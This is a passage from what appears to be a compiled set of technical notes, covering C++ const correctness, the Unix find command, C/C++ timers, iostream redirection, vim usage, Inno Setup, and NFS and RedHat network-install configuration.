The above example is indicative of bad C++ casting manners. Another way to write functionally equivalent code is to use the const_cast operator to remove the const-ness from the const int*. The result is the same:

const int x = 4;     // x is const, it can't be modified
const int* pX = &x;  // you can't modify x through the pX pointer

cout << x << endl; // prints "4"

int* pX2 = const_cast<int*>(pX);  // explicitly cast pX as non-const

*pX2 = 3;           // result is undefined
cout << x << endl;  // who knows what it prints?

Although this is still a naughty example, it shows why it's a good idea to use the const_cast operator. The const_cast operator is more specific than normal type-casts because it can only be used to remove the const-ness of a variable; trying to change its type in other ways is a compile error. For instance, say that you changed x in the old-style cast version of the above example to a double and changed pX to double*. The code would still compile, but pX2 would treat the data as an int. It might not cause a problem (because ints and doubles are somewhat similar), but the code would certainly be confusing. Also, if you were using user-defined classes instead of numeric types, the code would still compile, but it would almost certainly crash your program. If you use const_cast, you can be sure that the compiler will only let you change the const-ness of a variable, and never its type.

Const Storage and String Literals

Another example of using pointers to play around with const storage is when you try to use a char* to modify a string literal. In C++, the compiler allows the use of string literals to initialize character arrays. A string literal consists of zero or more characters surrounded by double quotation marks ("). A string literal represents a sequence of characters that, taken together, form a null-terminated string. The compiler creates static storage space for the string, null-terminates it, and puts the address of this space into the char* variable. The type of a literal string is an array of const chars. The C++ standard (section lex.string) states:

1 A string literal is a sequence of characters (as defined in _lex.ccon_) surrounded by double quotes, optionally beginning with the letter L, as in "..." or L"...". A string literal that does not begin with L is an ordinary string literal, also referred to as a narrow string literal. An ordinary string literal has type "array of n const char" and static storage duration (_basic.stc_), where n is the size of the string as defined below, and is initialized with the given characters. A string literal that begins with L, such as L"asdf", is a wide string literal. A wide string literal has type "array of n const wchar_t" and has static storage duration, where n is the size of the string as defined below, and is initialized with the given characters.

2 Whether all string literals are distinct (that is, are stored in nonoverlapping objects) is implementation-defined. The effect of attempting to modify a string literal is undefined.

In the following example, the compiler automatically puts a null-character at the end of the literal string of characters "Hello world". It then creates a storage space for the resulting string - this is an array of const chars. Then it puts the starting address of this array into the szMyString variable. We will try to modify this string (wherever it is stored) by accessing it via an index into szMyString. This is a Bad Thing; the standard


does not say where the compiler puts literal strings. They can go anywhere, possibly in some place in memory that you shouldn't be modifying.

char* szMyString = "Hello world.";
szMyString[3] = 'q';   // undefined, modifying static buffer!!!

In James Coplien's book, Advanced C++ Programming Styles & Idioms, I came across the following code (p. 400):

char *const a = "example 1"; // a const pointer to (he claims) non-const data
a[8] = '2';                  // Coplien says this is OK, but it's actually undefined

Both of these examples happen to work on my system, but you shouldn't rely on this kind of code to function correctly. Whether or not the literal strings you point to are explicitly declared const, you shouldn't try to modify them, because the standard states that they are in fact const. If you've been paying attention, you'll remember that the type-system in C++ will not allow you to put the address of const data into a pointer to non-const data without using explicit type casts, because there is no standard conversion between const types and types that are not const. Example:

const char constArray[] = { 'H', 'e', 'l', 'l', 'o', '\0' };
char nonConstArray[] = { 'H', 'e', 'l', 'l', 'o', '\0' };
char* pArray = constArray;    // illegal
char* pArray = nonConstArray; // legal

If, as the standard says, an ordinary string literal has type "array of n const char", then the following line of code should cause an error just like the above example:

// should be illegal - converts array of 6 const char to char*
char* pArray = "Hello";

Of course, this code is a common idiom and it's perfectly legal. This appears to be an inconsistency in the language standard. A lot of these inconsistencies exist because older C and C++ code would break if the standard were strictly consistent. The standards people are afraid to break old code, because it would mean a decrease in the popularity of the language. Notice item 2 in the above quote from the language standard: literal strings don't have to be distinct. This means that it is legal for implementations to use string pooling, where all equal string literals are stored at the same place. For example, the help in Visual C++ states:

"The /GF option causes the compiler to pool strings and place them in read-only memory. By placing the strings in read-only memory, the operating system does not need to swap that portion of memory. Instead, it can read the strings back from the image file. Strings placed in read-only memory cannot be modified; if you try to modify them, you will see an Application Error dialog box. The /GF option is comparable to the /Gf option, except that /Gf does not place the strings in read-only memory. When using the /Gf option, your program must not write over pooled strings. Also, if you use identical strings to allocate string buffers, the /Gf option pools the strings. Thus, what was intended as multiple pointers to multiple buffers ends up as multiple pointers to a single buffer."

To test this, you can write a simple program as follows:

#include <stdio.h>

int main()
{
    char* szFirst = "Literal String";
    char* szSecond = "Literal String";

    szFirst[3] = 'q';

    printf("szFirst (%s) is at %d, szSecond (%s) is at %d\n",
           szFirst, szFirst, szSecond, szSecond);

    return 0;
}

On my system, this program outputs:

szFirst (Litqral String) is at 4266616, szSecond (Litqral String) is at 4266616

Sure enough: although only szFirst was modified, string pooling was active, so both char* variables point to the same buffer, and the output reflects this.

Const and Data-Hiding

It is often useful to use const variables when you have private data in a class, but you want to easily access the data outside of the class without changing it. For example:

class Person
{
public:
    Person(char* szNewName)
    {
        // make a copy of the string
        m_szName = _strdup(szNewName);
    };

    ~Person()
    {
        free(m_szName); // _strdup allocates with malloc, so free, not delete[]
    };

private:
    char* m_szName;
};

Now, what if I wanted to easily print out the person's name? I could do the following:

class Person
{
public:
    Person(char* szNewName)
    {
        // make a copy of the string
        m_szName = _strdup(szNewName);
    };

    ~Person()
    {
        free(m_szName); // _strdup allocates with malloc, so free, not delete[]
    };

    void PrintName()
    {
        cout << m_szName << endl;
    };

private:
    char* m_szName;
};

Now I can call Person::PrintName() and it will print the name out to the console. There is a design problem with this code, however. It builds dependencies on the iostream libraries and the console I/O paradigm right into the Person class. Since a Person inherently has nothing to do with console I/O, one shouldn't tie the class to it. What if you want to print out the name in a Windows or X-Windows application? You'd need to change your class, and that reeks. So, we can do something like the following:


class Person
{
public:
    Person(char* szNewName)
    {
        // make a copy of the string
        m_szName = _strdup(szNewName);
    };

    ~Person()
    {
        free(m_szName); // _strdup allocates with malloc, so free, not delete[]
    };

    void GetName(char* szBuf, const size_t nBufLen)
    {
        // ensure null termination in the copy
        strncpy(szBuf, m_szName, nBufLen - 1);
        szBuf[nBufLen - 1] = '\0'; // strncpy alone does not guarantee termination
    };

private:
    char* m_szName;
};

Now we can print the name out by doing something like this:

Person P("Fred Jones");
char* szTheName = new char[256];
P.GetName(szTheName, 256);
cout << szTheName << endl;

Wow, three lines of code just to print out a name. And I bet you didn't even notice that we forgot to delete the dynamic memory for szTheName! There must be a better way to do this. Why don't we just return a pointer to the string?

class Person
{
public:
    Person(char* szNewName)
    {
        // make a copy of the string
        m_szName = _strdup(szNewName);
    };

    ~Person()
    {
        free(m_szName); // _strdup allocates with malloc, so free, not delete[]
    };

    char* GetName()
    {
        return m_szName;
    };

private:
    char* m_szName;
};

With this, you can print out the name in one line:

Person P("Fred Jones");
cout << P.GetName() << endl;

Much shorter, but as you may have noticed, the m_szName variable is private inside the Person class! What's the point of declaring it as private if you're going to pass out non-const pointers to it? What if you wrote a buggy print function that modified what it was printing?

// this function overwrites szString
// (which may have held the address of dynamically allocated memory)
void MyBuggyPrint(char* szString)
{
    // make a copy of the string and print out the copy
    szString = _strdup(szString);

    cout << szString << endl;
    free(szString);
}

Person P("Fred Jones");
MyBuggyPrint(P.GetName());

The MyBuggyPrint function makes a new string, puts the new string's address in its first parameter, prints it, then deletes it. This causes two related problems. First, we pass in a pointer to the string data that was allocated in the Person constructor; the pointer gets set to the location of the string copy, which then gets deleted, so P.m_szName is left pointing to garbage. Second, since you lose the original location of the string pointed to by m_szName, you never free that string, so it's a memory leak. Fortunately, the const keyword comes in handy in situations like this. At this point, I'm sure some readers will object that if you write your code correctly, you won't need to protect yourself from your own mistakes - "You can either buy leaky pens and wear a pocket protector, or just buy pens that don't leak, period." While I agree with this philosophy, it is important to remember that when you're writing code, you're not buying pens - you're manufacturing pens for other people to stick in their pockets. Using const helps in manufacturing quality pens that don't leak.

class Person
{
public:
    Person(char* szNewName)
    {
        // make a copy of the string
        m_szName = _strdup(szNewName);
    };

    ~Person()
    {
        free(m_szName); // _strdup allocates with malloc, so free, not delete[]
    };

    const char* const GetName()
    {
        return m_szName;
    };

private:
    char* m_szName;
};

Person P("Fred Jones");

MyBuggyPrint(P.GetName()); // error! Can't convert const char* const to char*

This time, we're returning a const char* const from the class, which means that you can't change the pointer to point somewhere else, and you can't modify what the pointer points to. Now your code won't even compile, because your MyBuggyPrint function expects a char*. This brings up an interesting point. If you wrote your code this way, you'd have to go back and rewrite your MyBuggyPrint function to take a const char* const (hopefully fixing it in the process). This is a pretty inefficient way to code, so remember that you should use const as you go - don't try to make everything const correct after the fact. As you're writing a function like MyBuggyPrint, you should think "Hmmm...do I need to modify what the pointer points to? No...do I need to point the pointer somewhere else? No...so I will use a const char* const argument." Once you start thinking like this, it's easy to do, and it will keep you honest; once you start using const correctness, you have to use it everywhere.


With this philosophy, we could further modify the above example by having the Person constructor take a const char* const, instead of a char*. We could also further modify the GetName member function. We can declare it as:

class Person
{
public:
    Person(char* szNewName)
    {
        // make a copy of the string
        m_szName = _strdup(szNewName);
    };

    ~Person()
    {
        free(m_szName); // _strdup allocates with malloc, so free, not delete[]
    };

    const char* const GetName() const
    {
        return m_szName;
    };

private:
    char* m_szName;
};

Declaring a member function as const tells the compiler that the member function will not modify the object's data and will not invoke other member functions that are not const. The compiler won't take you at your word; it will check to make sure that you really don't modify the data. You can call a const member function for either a const or a non-const object, but you can't call a non-const member function for a const object (because it could modify the object). If we declare GetName() as a const member function, then the following code is legal:

void PrintPerson(const Person* const pThePerson)
{
    cout << pThePerson->GetName() << endl; // OK
}

// a const-reference is simply an alias to a const variable
void PrintPerson2(const Person& thePerson)
{
    cout << thePerson.GetName() << endl; // OK
}

But if we don't declare it as const, then the code won't even compile.

void PrintPerson(const Person* const pThePerson)
{
    // error - non-const member function called
    cout << pThePerson->GetName() << endl;
}

void PrintPerson2(const Person& thePerson)
{
    // error - non-const member function called
    cout << thePerson.GetName() << endl;
}

Remember that non-static member functions take as their implicit first parameter a pointer called this, which points to a specific instance of the object. The this pointer is always const - you cannot make this point to anything else (in earlier versions of C++, this was legal).


A const member function in class Person would take a const class Person* const (const pointer to const Person) as its implicit first argument, whereas a non-const member function in class Person would take a class Person* const (const pointer to changeable Person) as its first argument.

The Mutable Storage Specifier

What if you wanted to have a const member function which did an expensive calculation and returned the result? It would be nice to be able to cache this result and avoid recalculation for subsequent calls to the function. But since it's a const member function, you can't store the cached result inside the class, because to do so, you'd have to modify a member variable (thereby violating const). You could make a fake this pointer using explicit casting:

class MyData
{
public:
    /* the first time, do the calculation, cache the result in m_lCache,
       and set m_bCacheValid to true. On subsequent calls, if m_bCacheValid
       is true, return m_lCache instead of recalculating */
    long ExpensiveCalculation() const
    {
        if (false == m_bCacheValid)
        {
            MyData* fakeThis = const_cast<MyData*>(this);
            fakeThis->m_bCacheValid = true;
            fakeThis->m_lCache = ::SomeFormula(m_internalData);
        }
        return m_lCache;
    };

    // change internal data and set m_bCacheValid to false to force recalc next time
    void ChangeData()
    {
        m_bCacheValid = false;
        m_internalData = ::SomethingElse();
    };

private:
    data m_internalData;
    long m_lCache;
    bool m_bCacheValid;
};

This works, but it's somewhat ugly and unintuitive. The mutable storage specifier was added for this reason. A mutable member variable can be modified even by const member functions. With mutable, you can distinguish between "abstract const", where the user cannot tell that anything has been changed inside the class, and "concrete const", where the implementation will not modify anything at all. This caching of results is a perfect example of abstract const-ness. Anyone calling the const member function will not know or care whether the result has been cached or recalculated. For example:

class MyData
{
public:
    /* the first time, do the calculation, cache the result in m_lCache,
       and set m_bCacheValid to true. On subsequent calls, if m_bCacheValid
       is true, return m_lCache instead of recalculating */
    long ExpensiveCalculation() const
    {
        if (false == m_bCacheValid)
        {
            m_bCacheValid = true;
            m_lCache = ::SomeFormula(m_internalData);
        }
        return m_lCache;
    };

    // change data and set m_bCacheValid to false to force recalc next time
    void ChangeData()
    {
        m_bCacheValid = false;
        m_internalData = ::SomethingElse();
    };

private:
    data m_internalData;
    mutable long m_lCache;
    mutable bool m_bCacheValid;
};

References

This paper represents a synthesis and compilation of information from the following sources:

- The C++ Programming Language, 2nd ed., by Bjarne Stroustrup
- Advanced C++ Programming Styles & Idioms, by James O. Coplien
- Microsoft Visual C++ Online Help
- Conversations with Prof. Richard Rasala of the College of Computer Science at Northeastern University
- The ISO Draft C++ Standard


Some examples of using the UNIX find command (Linux)

Taken from: http://www.athabascau.ca/html/depts/compserv/webunit/HOWTO/find.htm

Contents:

Introduction
Search for a file with a specific name in a set of files (-name)
How to apply a unix command to a set of files (-exec)
How to apply a complex selection of files (-o and -a)
How to search for a string in a selection of files (-exec grep ...)

Introduction

The find command allows the Unix user to process a set of files and/or directories in a file subtree. You can specify the following:

where to search (pathname)
what type of file to search for (-type: directories, data files, links)
how to process the files (-exec: run a process against a selected file)
the name of the file(s) (-name)
perform logical operations on selections (-o and -a)
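For example, a search combining a path, a file type and a name pattern might look like this (the paths are illustrative, and -maxdepth is a GNU find extension):

```shell
# find directories (-type d) named "backup*" under /var,
# descending at most two levels
find /var -maxdepth 2 -type d -name "backup*" -print
```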

Search for a file with a specific name in a set of files (-name)

find . -name "rc.conf" -print

This command will search the current directory and all subdirectories for a file named rc.conf. Note: the -print option prints the path of any file found with that name. In general, -print will print the path of any file that meets the find criteria.

How to apply a unix command to a set of files (-exec).

find . -name "rc.conf" -exec chmod o+r '{}' \;

This command will search the current directory and all subdirectories. All files named rc.conf will be processed by the chmod o+r command. The argument '{}' inserts each found file into the chmod command line. The \; argument indicates that the -exec command line has ended. The end result of this command is that all rc.conf files have their 'other' permissions set to read access (if the operator is the owner of the files).

How to apply a complex selection of files (-o and -a).

find /usr/src -not \( -name "*,v" -o -name ".*,v" \) -print

This command will search in the /usr/src directory and all sub directories. All files that are of the form '*,v' and '.*,v' are excluded. Important arguments to note are:

-not means the negation of the expression that follows
\( marks the start of a complex expression
\) marks the end of a complex expression
-o means a logical OR within a complex expression

In this case the complex expression is all files like '*,v' or '.*,v'


The above example shows how to select all files that are not part of the RCS system. This is important when you want to go through a source tree and modify all the source files, but you don't want to affect the RCS version control files.

How to search for a string in a selection of files (-exec grep ...).

find . -exec grep "www.athabasca" '{}' \; -print

This command will search the current directory and all subdirectories. All files that contain the string will have their path printed to standard output. If you just want to find each file and then pass it on for processing, use grep's -q option. It finds the first occurrence of the search string, signals success to find, and find continues searching for more files.

find . -exec grep -q "www.athabasca" '{}' \; -print

This command is very important for processing a series of files that contain a specific string; you can then process each file appropriately. An example is finding all html files containing the string "www.athabascau.ca". You can then process the files with a sed script to change those occurrences of "www.athabascau.ca" to "intra.athabascau.ca".
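The find/grep/sed combination described above could be sketched as follows (a sketch assuming GNU sed's -i in-place flag, and filenames without spaces):

```shell
# For every HTML file that contains the old hostname,
# rewrite it in place with sed.
find . -name "*.html" -exec grep -q "www.athabascau.ca" '{}' \; -print |
while read -r file; do
    sed -i 's/www\.athabascau\.ca/intra\.athabascau\.ca/g' "$file"
done
```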


Timers (C/C++)

ANSI C

The clock() function returns clock ticks.

#include <time.h>

clock_t start, end;
double elapsed;

start = clock();
/* <code to be timed> */
end = clock();
elapsed = ((double) (end - start)) / CLOCKS_PER_SEC;

The gettimeofday() function has a resolution of microseconds.

C++

#include <sys/time.h>
#include <stdio.h>

int main()
{
    struct timeval Tps, Tpf;

    gettimeofday(&Tps, NULL);
    /* <code to be timed> */
    gettimeofday(&Tpf, NULL);
    printf("Total Time (usec): %ld\n",
           (Tpf.tv_sec - Tps.tv_sec) * 1000000 + Tpf.tv_usec - Tps.tv_usec);
}

As with FORTRAN codes, MPI_Wtime() may also be used with C/C++ codes to determine the time since a particular date.

C++ example

#include <mpi.h>

double start, finish;

start = MPI_Wtime();
/* <code to be timed> */
finish = MPI_Wtime();

printf("Final Time: %f", finish - start);
/* Time is in seconds since a particular date */


Output Redirection ( iostream ) (C++)

This code redirects the standard output stream (cout) to the file cout.txt.

#include <iostream>
#include <fstream>

using namespace std;

int main()
{
    {
        ofstream of("cout.txt");
        of.copyfmt(cout);
        cout.rdbuf(of.rdbuf());

        int i;
        while (cin >> i)
            cout << i;
    } // here the local of destroys the streambuf of cout

    cout << 1;
    return 0;
}

Be careful: when of goes out of scope, its stream buffer is destroyed while cout still points to it. Therefore the following is the correct version:

#include <iostream>
#include <fstream>

using namespace std;

int main()
{
    {
        ofstream of("cout.txt");
        of.copyfmt(cout);
        streambuf *saved_buffer = cout.rdbuf();
        cout.rdbuf(of.rdbuf());

        int i;
        while (cin >> i)
            cout << i;

        cout.rdbuf(saved_buffer); // restore before of is destroyed
    }

    cout << 1;
    return 0;
}

Note: if you want to use this throughout the code, just define a global ofstream variable, so that the stream buffer is never destroyed.


ios& copyfmt ( const ios& rhs );

Copy formatting information

Copies the values of all the internal members of the object rhs (except the state flags and the stream buffer pointer) to the corresponding members of *this. This includes the format flags, the fill character, the tie pointer and all formatting information. Every external object pointed to by rhs is copied to a newly constructed object for *this.

The exception mask is the last to be copied.

Before copying any parts of rhs, this member function triggers an erase_event event which invokes the registered callback functions, if any (see ios_base::register_callback).

Parameters

rhs: Object whose members are to be copied to *this.

Return Value

The function returns *this.


Vim Search and Replace

[http://www.felixgers.de/teaching/emacs/vi_search_replace.html]

Change to normal mode with <ESC>.

Search (wraps around at the end of the file):

Search STRING forward:  /STRING
Search STRING backward: ?STRING

Repeat search: n
Repeat search in the opposite direction: N (SHIFT-n)

Replace (same syntax as sed), replace OLD with NEW:

First occurrence on current line:  :s/OLD/NEW
Globally (all) on current line:    :s/OLD/NEW/g
Between two lines #,#:             :#,#s/OLD/NEW/g
Every occurrence in file:          :%s/OLD/NEW/g

Editing in hex mode

There are many things vi can do, for instance invoking other commands to process files. That's pretty cool.

Since installing Okteta isn't always an option, here's a small snippet on how to get simple hex-editing capabilities in vi:

1. vi -b myfile
2. [in vi] :%!xxd
3. [to return to the previous view] :%!xxd -r

Pretty easy, pretty handy. Something to keep in mind. Another thing to keep in mind: Always open binary files with the -b switch, otherwise you’ll damage the files when saving them with vi.


Inno Setup (Windows)

HOWTO: Run batch files

Under Inno Setup 4.0.9 and later, you may run a batch file by specifying the filename directly in the Filename parameter of a [Run] section entry:

[Run]
Filename: "{app}\YourBatchFile.bat"

Note: If you find that on Windows 95/98/Me the console window remains on the screen after the batch file has finished executing, add a "CLS" command to the end of it.

In previous versions of Inno Setup, the recommended way to run a batch file is as follows:

[Run]
Filename: "{cmd}"; Parameters: "/C ""{app}\YourBatchFile.bat"""


Configure NFS (Linux)

Configuring an NFS server

To configure an NFS server on Linux it is essential to edit the /etc/exports file and start the portmap and nfs services.

The /etc/exports file is simply a list that specifies which resources to share and how (e.g. read-only or read-write), and with which credentials clients may access those resources (e.g. the source IP of a given network). You must be root to modify this file. An example of the file follows:

[opgnc@draco root]$ cat /etc/exports
# The directory /export and all its contents are exported via NFS
# read-only (ro), and only to clients with an IP in network 10.0.0.0/24
/export                10.0.0.0/255.255.255.0(ro)
# The directory /home/kernel and all its contents are exported via NFS
# read-write (rw), and only to clients with an IP in network 10.0.0.0/24
/home/kernel        10.0.0.0/255.255.255.0(rw)

Once the changes to /etc/exports are done, start the RPC and NFS daemons:

/etc/rc.d/init.d/portmap start

/etc/rc.d/init.d/nfs start

If the service was already running, simply run the following command to have the /etc/exports file re-read and the internal support tables of the NFS service updated:

exportfs -a

Client-side NFS configuration

To mount an NFS filesystem from a remote server on the local system you can:

- use a temporary solution, with the mount command, to make the share exported by the NFS server available in the current session;

- add a line to the /etc/fstab file, so that at every boot the system automatically mounts and unmounts the NFS shares.

The common client-side options for mounting the remote filesystem (passed with mount -o) are the following:

rw    Mounts the NFS share with read and write permissions.
ro    Mounts the NFS share with read-only permissions.
bg    If the first mount of an NFS share times out, the mount process continues in the background.
soft  Allows the NFS client to report an error to the process accessing the NFS share.
hard  A process accessing an NFS share hangs if the server crashes; if the resource comes back, the process automatically resumes. Otherwise, the only way to interrupt the process is to also specify the intr option.
intr  Allows the process to be interrupted in case of problems with the NFS share.

Examples.

Mount command, to mount:
mount -t nfs -o bg,intr,hard 10.0.0.25:/export/8.0 /rpms

To unmount:
umount /rpms

Entry in /etc/fstab:
10.0.0.25:/export/8.0    /rpms    nfs    bg,hard,intr,ro 0 0

Command to mount it in the current session:
mount -a -t nfs

To mount a remote share via NFS, the portmapper must be running on the client. To start it (on RedHat and similar distributions):

/etc/init.d/portmap start

NFS and TCP wrappers

Using hosts.allow and hosts.deny it is possible to limit access to the shares to specific addresses. Below is a small example of a hosts.allow and hosts.deny configuration:

[root@draco root]# cat /etc/hosts.deny
# hosts.deny    This file describes the names of the hosts which are
#               *not* allowed to use the local INET services, as decided
#               by the '/usr/sbin/tcpd' server.
# Deny access to all the individual daemons related to NFS
portmap:ALL
lockd:ALL
mountd:ALL
rquotad:ALL
statd:ALL

[root@draco root]# cat /etc/hosts.allow
# hosts.allow   This file describes the names of the hosts which are
#               allowed to use the local INET services, as decided
#               by the '/usr/sbin/tcpd' server.
# Allow access only to hosts considered trusted
portmap:10.0.0.0/255.255.255.0
lockd:10.0.0.0/255.255.255.0
mountd:10.0.0.0/255.255.255.0
rquotad:10.0.0.0/255.255.255.0
statd:10.0.0.0/255.255.255.0


NFS tuning

Since NFS is a service based on a client/server architecture, tuning to optimize its performance can take place both server-side and client-side.

Optimizing data transfer speed

With the mount options rsize and wsize you can specify the size of the read and write data blocks on the client side; the values you may use depend on the kernel release and on the version of the NFS protocol in use. NFS protocol v2 has an 8 KB limit (with the patches implementing NFS over TCP for the 2.4.x kernel you can go up to 32 KB), while for NFS protocol v3 the limit is on the server side and is specified by the NFSSVC_MAXBLKSIZE constant.

[neo@dido neo]$ cat /usr/src/linux/include/linux/nfsd/const.h | grep -i nfs
[...]
#define NFSSVC_MAXVERS        3
#define NFSSVC_MAXBLKSIZE    8192
#ifndef NFS_SUPER_MAGIC
# define NFS_SUPER_MAGIC    0x6969
[...]
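On the client, these sizes are passed as mount options; a sketch reusing the server address and paths from the earlier examples:

```shell
# request 8 KB read and write blocks (the NFS v2 limit discussed above)
mount -t nfs -o rsize=8192,wsize=8192 10.0.0.25:/export/8.0 /rpms
```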

NFS over TCP

Since kernel 2.4.20 you can select the "NFS over TCP" option from the config menu to enable this feature when compiling the kernel. Using TCP instead of UDP brings all the advantages of that protocol, such as the ability to retransmit a single lost packet rather than the whole RPC request, besides not being stateless like UDP.

Broadly speaking, this advantage matters only on a poorly performing network where, for some reason, transmission errors are frequent; on a well-performing network, where transmission errors and malformed packets are reduced to a minimum, UDP can still be a sensible choice, since it has a lower latency than TCP.

Number of NFSD instances

The standard (RedHat) configuration provides 8 instances of nfsd; you can change this value by editing the RPCNFSDCOUNT variable in the service management script /etc/rc.d/init.d/nfs:

[root@dido linux]# grep RPCNFSDCOUNT /etc/rc.d/init.d/nfs
RPCNFSDCOUNT=8

As a rough guideline, the number of instances should be higher on NFS servers that must sustain heavy traffic from many different clients, and lower on those that see less traffic.

General tips

Besides NFS-specific tuning, you should also optimize all those aspects not strictly tied to the service, such as disk read and write speed, and use optimized, high-performance network equipment and cabling.


exportfs

A command that manages the shares exported via NFS.

exportfs [-avi] [-o options,..] [client:/path ..]
exportfs -r [-v]
exportfs [-av] -u [client:/path ..]

Options:
-a  Exports or unexports all directories.
-o  Specifies options, as they would be used to configure the NFS server in /etc/exports.
-i  Ignores the /etc/exports configuration file.
-r  Re-exports all directories, synchronizing /var/lib/nfs/xtab with /etc/exports.
-u  Unexports one or more directories.
-v  Enables verbose mode.


/etc/exports

Author: neo - Last updated: 2004-06-04 11:45:18 - Created: 2004-06-04 11:45:18
Infobox type: PATH - Skill: 4 - ADVANCED

This is the file that manages access to the shares exported by the NFS server, and it is also the support file for the exportfs and mount commands. As in most configuration files, blank lines and lines beginning with '#' are ignored. Each line corresponds to an entry for one share and must contain at least the following information:

- Export point (the directory or partition being exported)
- Access list (who may access the resource, and with which permissions)

[root@draco root]# cat /etc/exports
# Export NFS share, Added by neo at 08 Feb 2002
# Kickstart share: the export point /export/7.2 can be mounted only by
# clients coming from the 10.0.0.0/24 network, and only read-only
/export/7.2          10.0.0.0/255.255.255.0(ro)
/export/7.3          10.0.0.0/255.255.255.0(ro)
/export/8.0          10.0.0.0/255.255.255.0(ro)
/home/ksfile         10.0.0.0/255.255.255.0(ro)
# Errata & Contrib
/export/contrib_7.2    10.0.0.0/255.255.255.0(ro)
/export/contrib_7.3    10.0.0.0/255.255.255.0(ro)
/export/errata_7.2    10.0.0.0/255.255.255.0(ro)
/export/errata_7.3    10.0.0.0/255.255.255.0(ro)
/export/errata_8.0    10.0.0.0/255.255.255.0(ro)
/export/tarballs    10.0.0.0/255.255.255.0(ro)
# Home: the home of user neo is exported; it can be mounted only by the
# host dido, and read-write
/home/neo       dido(rw)

The file's syntax is very similar to the Sun Solaris export file, except for some options. Below is a list of the common options and the possible formats of an entry.

Common options:

ro  Read-only access.
rw  Read and write access.
no_root_squash  By default, all requests made by root on the client are mapped on the server as requests made by nobody. If this option is enabled, the root user on the client machine has exactly the same privileges as the root user on the server machine. Obviously this can have serious security implications; avoid using this option without a good reason.
no_subtree_check  Disables the extra check that verifies each file requested by the client actually lies within the exported subtree. That check is useful only when the exported share is just part of a volume (e.g. a subdirectory); otherwise, specify this option to improve the NFS server's performance.

Access list syntax

There are several ways to specify which clients may access the shared resources:

Single host
Simply specify a single host, either by its IP address or by a name that will be resolved via DNS. Example:
/home/neo       dido(ro)


Netgroups
NIS netgroups can be used, specified with a @. Example:
/home/www       @webserver(ro)

Wildcards
Wildcards such as * or ? can be used to broaden an entry's matching. Example (all hosts in the openskills.info domain may access the /home/www share in read-write mode):
/home/www       *.openskills.info(rw)

IP networks
You can also specify an entire network or subnet, using the syntax IP address/netmask. Example:
/home/www       192.168.0.0/255.255.255.0(rw)
or
/home/www       192.168.0.0/24(rw)

/var/lib/nfs/xtab

File di appoggio per NFS server per mantenere traccia dei filesystem esportati.

Example of the xtab file of a kickstart server that runs an NFS server:

[root@draco root]# cat /var/lib/nfs/xtab
[...]
/export/8.0  10.0.0.93(ro,async,wdelay,hide,secure,no_root_squash,no_all_squash,subtree_check,secure_locks,mapping=identity,anonuid=-2,anongid=-2)
[...]

In this case the entry shows that the client with IP 10.0.0.93 has mounted the /export/8.0 resource with the options listed in parentheses.


Ncurses Notes ( C++ - Linux )

Direct link to another local document.

Appunti_ncurses.docx

Network Install HOWTO: Redhat Server Setup ( Linux )

Network-Install-HOWTO.html.gz

6. Setting up the RedHat server

This section explains how to configure your server to become a RedHat Linux installation server. You can configure any Linux distribution to become a RedHat Linux installation server; the computer itself does not need to have the RedHat distribution installed.

This guide assumes that you have a computer with Linux already installed, configured and connected to your network. If you need help installing Linux on your server, please consult the "Further information" section of this HOWTO in Appendix A.

6.1 Setting up the file space

For your server to work as a RedHat installation server, you will need to put on it all the data required to perform a complete installation of the RedHat version you are going to serve. For example, if you are used to installing RedHat from CDs, you will need enough space on your server to copy the ENTIRE contents of every CD onto it.

Therefore, before you even think about configuring your machine as an installation server, you must check that you have the required space available. This may seem a silly thing to check, but it is very important and can easily be forgotten during setup.

How much space will you need?

A guide for calculating the space you may need is the amount of space corresponding to the CDs you intend to copy. It could be one of the following rough estimates:

Number of CDs x 650MB
Number of ISO images x 650MB

How much space do you have?

You will need the appropriate amount of space available to your system on some local filesystem. It does not matter what form this takes, whether it is a RAID device, a local disk (either EIDE or SCSI), etc. Make sure the space you intend to use is formatted with your chosen filesystem and is mounted.


You can check this space with the command:

df -h

If the result shows that you have enough space to copy your installation disks, you can continue. If not, it is time to think about an upgrade for your future server machine!

6.2 Copy the installation media

As soon as you know you have enough space available, it is time to copy your installation media to the chosen filesystem and directory. For the purposes of this HOWTO we will use the following example to represent the directory from which our installation server will be configured and run:

/install

Copy your installation media into /install. The following example shows how to copy your RedHat CD images into the /install directory:

1. Mount your CD, e.g. mount /mnt/cdrom

2. Copy the data from the CD, e.g. cp -av /mnt/cdrom /install

3. Unmount the CD, e.g. umount /mnt/cdrom

4. Now change CDs and repeat from step 1 for each of the CDs you have.

6.3 Enable remote access

It is time to make your installation data available to the other computers on the network. RedHat can be installed over the network using the NFS, HTTP and FTP protocols. You select which of these to use on the client at installation time. If one of the services is not configured on the computer, it will still be selectable on the client, but the installation program will not work. Therefore, the best thing is either to enable all three protocols on your server (so that they all work for every client machine) or, if you do not enable all three, to state very clearly which service must be used with your particular installation server.

NFS

The NFS protocol is the only one that works with RedHat's graphical installation method when installing your clients. Therefore, if you want to perform graphical installations (as opposed to text-mode ones), you must enable this service on your server.

To install via NFS, a few conditions must be met on the server:

- Your installation directory must be exported
- NFS must be installed and running
- Portmap must be running

To export your installation directory, edit the /etc/exports file and add an entry for /install. In our example, we will use the following line:

/install *(ro)


When you have saved your exports file, you must tell the NFS daemon to re-read its configuration file so that it exports the directory you have just added. Do this by running the command:

exportfs -r   [I had to restart the nfs service...]

This performs the simplest read-only export to all the computers on your network. If you want to include more advanced options in your exports file, for example exporting only to certain computers on the network or only to a certain subnet, etc., then read the manual page for the exports file: exports(5).

[...]

At this point you need to set up the client...

Boot it in some way:

Floppy, USB stick, USB CD reader...

I used a CD reader attached via USB, put in the first RedHat CD and then selected NFS to tell it where the RPMs were...

Floppy or USB stick should work like this:

7.2 Booting the computer

The simplest way is to use a floppy disk to boot your clients ready for installation. Everything you need is provided on the RedHat CDs, as follows:

1. If you have not yet created a boot disk, do it now (you only need to do this once; once you have a boot disk you can install as many computers as you want with the single disk):

o Locate the floppy image you need. It is on the first RedHat CD, in images/bootnet.img

o From the images directory on the CD, copy the image to your floppy (make sure one is inserted in the drive, but not mounted) using the following command:

o dd if=bootnet.img of=/dev/fd0

2. If you are doing an automated installation (with a kickstart file), follow this step (otherwise skip to the next one):

o Mount your floppy
o mount /mnt/floppy

o Copy your kickstart file to the top-level directory of the floppy, naming it ks.cfg

o cp path/file /mnt/floppy

o Unmount your floppy
o umount /mnt/floppy

3. Insert your floppy into the client computer on which you want to install RedHat. Make sure the floppy drive is in your BIOS list of boot devices, and power the computer on so that it boots from the floppy.

4. At the boot prompt:
o If you are doing an automated installation:
